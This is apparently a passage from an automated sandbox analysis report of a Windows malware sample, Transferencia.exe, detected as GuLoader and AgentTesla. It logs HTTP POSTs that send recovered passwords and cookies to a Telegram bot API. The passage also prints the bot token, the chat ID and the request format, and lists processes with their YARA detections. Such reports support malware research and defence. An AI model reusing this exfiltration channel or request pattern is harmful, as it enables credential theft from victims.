9a 7a 7c 45 a2 75 25 6e 6e c6 c2 f6 dd f4 22 06 1c da ff 5a bc 0c d3 73 dc 2c 1a 6a 5b 86 8a 8e cb e3 7c c3 84 7d af 4d 91 18 be c0 39 b4 6a 54 66 1e 2d f7 09 1d 10 7e e5 f5 65 eb 94 4f 21 7d 02 2d c4 ee
                                            Data Ascii: p5TK1#xDg>Hd1I*~>"C}zjBL9(_`:+?wC0+1.vw%YT_%r;:U0;;.,#hDe?XPs>orpn-6M*Q$>:pq4z|Eu%nn"Zs,j[|}M9jTf-~eO!}-


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.11.2049776149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            TimestampkBytes transferredDirectionData
                                            2022-05-11 11:28:31 UTC215OUTPOST /bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocument HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=---------------------------8da3355f7c6849e
                                            Host: api.telegram.org
                                            Content-Length: 1033
                                            Expect: 100-continue
                                            Connection: Keep-Alive
                                            2022-05-11 11:28:31 UTC216INHTTP/1.1 100 Continue
                                            2022-05-11 11:28:31 UTC216OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 33 35 35 66 37 63 36 38 34 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 33 33 39 38 30 39 35 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 33 35 35 66 37 63 36 38 34 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 72 74 68 75 72 2f 34 31 34 34 30 38 0a 4f 53 46 75 6c
                                            Data Ascii: -----------------------------8da3355f7c6849eContent-Disposition: form-data; name="chat_id"5333980955-----------------------------8da3355f7c6849eContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/414408OSFul
                                            2022-05-11 11:28:31 UTC217OUTData Raw: 36 38 34 39 65 2d 2d 0d 0a
                                            Data Ascii: 6849e--
                                            2022-05-11 11:28:31 UTC217INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Wed, 11 May 2022 11:28:31 GMT
                                            Content-Type: application/json
                                            Content-Length: 593
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            {"ok":true,"result":{"message_id":210,"from":{"id":5288820614,"is_bot":true,"first_name":"buzzu","username":"buzzu22_bot"},"chat":{"id":5333980955,"first_name":"MainBuz22","type":"private"},"date":1652268511,"document":{"file_name":"user-414408 2022-05-11 01-52-59.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAPSYnud37RPSYnwbeARjHyBVcO8L9QAAswPAALpaNhTBz2g2J2OFNAkBA","file_unique_id":"AgADzA8AAulo2FM","file_size":459},"caption":"New PW Recovered!\n\nUser Name: user/414408\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz\nRAM: 8191.25 MB"}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.11.2049777149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            TimestampkBytes transferredDirectionData
                                            2022-05-11 11:28:34 UTC218OUTPOST /bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocument HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=---------------------------8da33572e228161
                                            Host: api.telegram.org
                                            Content-Length: 21529
                                            Expect: 100-continue
                                            2022-05-11 11:28:34 UTC218INHTTP/1.1 100 Continue
                                            2022-05-11 11:28:34 UTC218OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 33 35 37 32 65 32 32 38 31 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 33 33 39 38 30 39 35 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 33 35 37 32 65 32 32 38 31 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 72 74 68 75 72 2f 34 31 34 34 30 38 0a 4f
                                            Data Ascii: -----------------------------8da33572e228161Content-Disposition: form-data; name="chat_id"5333980955-----------------------------8da33572e228161Content-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/414408O
                                            2022-05-11 11:28:34 UTC219OUTData Raw: a1 7f 59 5e 72 f3 2f c1 3a 80 11 0a 8e 4a c3 d3 e8 38 12 fd 5f 39 a4 50 f1 64 2a 9e be 54 ca 02 37 34 46 18 02 a1 fe 67 37 30 86 23 72 0c 15 cb 88 1d 6c 04 8e f8 2f 5c 6a cf 3b a4 90 a9 ff 42 18 8c e9 05 c0 30 9a 82 a1 fe 2b 79 da 5a 3e ae 0e 1e 3e 36 f2 6a 4b 93 88 96 fc 7c aa d0 92 07 12 82 96 3c 10 8f ea ea 30 2e 2e 49 a4 34 2b 0b 9e 14 8a 8b a7 45 13 00 e7 98 18 3a 99 f9 37 fa 57 82 44 eb fc fa 45 18 3a c1 f6 fc 7f 3a 43 81 80 fc 47 08 63 e5 96 14 17 67 4d 45 30 0b 6a 22 8e 8e 01 2e b6 df 8a 68 e0 13 35 a0 6c 75 76 73 b5 f3 45 7a a2 ec 91 0b 72 e2 af fc e7 ee e9 e0 82 f4 0c 90 77 b2 09 d0 92 9f 2b 45 17 38 57 57 65 e3 92 34 15 ff 53 9e 03 2c a0 75 80 9f ec 0c 4d 3c 80 30 08 e3 62 87 5e 67 81 8e 42 5f 32 fe 03 01 01 01 01 01 01 01 01 01 01 01 01 01 01
                                            Data Ascii: Y^r/:J8_9Pd*T74Fg70#rl/\j;B0+yZ>>6jK|<0..I4+E:7WDE::CGcgME0j".h5luvsEzrw+E8WWe4S,uM<0b^gB_2
                                            2022-05-11 11:28:34 UTC235OUTData Raw: d7 94 d7 94 bd 97 f5 33 ab 1b 2b 3f cb 20 4f 35 87 35 4f 8f c0 06 36 41 0e 3c 5b 2c c7 03 2e 5d de 66 de a3 7c 6c d0 78 a8 fd bf e8 49 33 7c 98 ff df d6 6d ff 67 c8 02 2d 1d 28 eb b2 8d 1a c4 7a 15 a0 82 5b 7c 77 51 65 86 08 92 01 aa 24 86 ab 65 6a 1f c4 3a 29 a0 c8 06 6e 2e 2a 9e 11 81 ec 01 2c 39 ff d3 de 9f 47 82 0b a2 24 ca 50 f9 f7 14 bf ab 83 35 82 2a cd 28 39 80 8f 43 c9 31 21 04 1c 96 d1 1e 8e 02 c6 eb 1d ac 6d 10 d1 32 40 a5 b0 f4 9e b5 17 e3 8b 94 55 5c 10 84 14 e3 26 a3 eb c1 28 0e 68 58 2a 9e c2 0c 3b 34 3a 1c 13 4a 43 90 b5 19 f7 4d 97 bb 0f 6c 22 0a a7 63 c2 d1 3e 48 b4 ae ae 91 9e ae 9e 9e 0e 5a 1f 41 92 05 4e 58 5e f6 0b f8 50 04 91 a1 05 21 ba fc e3 10 04 0e 6b 16 9d 7f 2b 30 a4 81 d1 9e c5 b1 ce 1c d8 41 e0 f4 80 c1 01 c6 bd 7f 3e 0e 80
                                            Data Ascii: 3+? O55O6A<[,.]f|lxI3|mg-(z[|wQe$ej:)n.*,9G$P5*(9C1!m2@U\&(hX*;4:JCMl"c>HZANX^P!k+0A>
                                            2022-05-11 11:28:34 UTC239OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 33 35 37 32 65 32 32 38 31 36 31 2d 2d 0d 0a
                                            Data Ascii: -----------------------------8da33572e228161--
                                            2022-05-11 11:28:34 UTC239INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Wed, 11 May 2022 11:28:34 GMT
                                            Content-Type: application/json
                                            Content-Length: 604
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            {"ok":true,"result":{"message_id":211,"from":{"id":5288820614,"is_bot":true,"first_name":"buzzu","username":"buzzu22_bot"},"chat":{"id":5333980955,"first_name":"MainBuz22","type":"private"},"date":1652268514,"document":{"file_name":"user-414408 2022-05-11 02-01-16.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAPTYnud4kvjtNB8Ez5x6XNglo7gXcYAAs0PAALpaNhT9XTCL4le8HckBA","file_unique_id":"AgADzQ8AAulo2FM","file_size":20946},"caption":"New Cookie Recovered!\n\nUser Name: user/414408\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz\nRAM: 8191.25 MB"}}


                                            Click to jump to process

                                            Target ID:2
                                            Start time:13:27:35
                                            Start date:11/05/2022
                                            Path:C:\Users\user\Desktop\Transferencia.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Transferencia.exe"
                                            Imagebase:0x400000
                                            File size:254208 bytes
                                            MD5 hash:FB1D131568BDD2FA951608534F83A75C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.100639341995.0000000002FD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low

                                            Target ID:9
                                            Start time:13:28:04
                                            Start date:11/05/2022
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Transferencia.exe"
                                            Imagebase:0xf70000
                                            File size:108664 bytes
                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.100478953847.0000000001350000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Target ID:10
                                            Start time:13:28:04
                                            Start date:11/05/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66c250000
                                            File size:875008 bytes
                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            No disassembly